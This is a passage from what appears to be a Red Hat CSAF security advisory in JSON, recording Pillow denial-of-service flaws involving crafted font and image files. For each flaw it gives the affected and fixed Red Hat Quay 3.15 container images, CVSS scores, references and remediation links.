"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Pillow: Pillow: Memory disclosure or denial of service via crafted McIdas AREA image"
},
{
"cve": "CVE-2026-54060",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2026-07-06T20:02:29.509113+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2497466"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. When processing a specially crafted font file, the library\u0027s font compilation function does not adequately check for excessive memory allocation. This oversight allows a remote attacker to trigger an unreasonable consumption of system memory, leading to a denial of service (DoS) for the application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Pillow: Denial of Service via excessive memory allocation when processing font files",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in Pillow prior to version 12.3.0. The FontFile.compile() method in PIL/FontFile.py assembles per-glyph images into a combined bitmap using Image.new() without calling Image._decompression_bomb_check(). This allows a specially crafted font file to trigger excessive memory allocation during conversion or saving, leading to denial of service via resource exhaustion.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-54060"
},
{
"category": "external",
"summary": "RHBZ#2497466",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497466"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-54060",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54060"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-54060",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54060"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst",
"url": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d",
"url": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-5x94-69rx-g8h2",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-5x94-69rx-g8h2"
}
],
"release_date": "2026-07-06T18:49:23.788000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-30T20:01:08+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:48933"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pillow: Pillow: Denial of Service via excessive memory allocation when processing font files"
},
{
"cve": "CVE-2026-55379",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-07-06T20:01:29.922515+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2497452"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by providing a specially crafted BDF font file. The library\u0027s image processing function fails to properly validate dimensions from the font file, bypassing a critical security check designed to prevent excessive memory usage. This oversight can lead to the system consuming an unreasonable amount of memory, making it unavailable to legitimate users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Pillow: Denial of Service via crafted BDF font file",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in the Pillow Python imaging library. The BDF font file parser passes attacker-controlled dimensions to Image.new() without decompression bomb validation, allowing excessive memory allocation and denial of service.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-55379"
},
{
"category": "external",
"summary": "RHBZ#2497452",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497452"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-55379",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-55379"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-55379",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55379"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst",
"url": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d",
"url": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-45hq-cxwh-f6vc",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-45hq-cxwh-f6vc"
}
],
"release_date": "2026-07-06T18:52:11.633000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-30T20:01:08+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
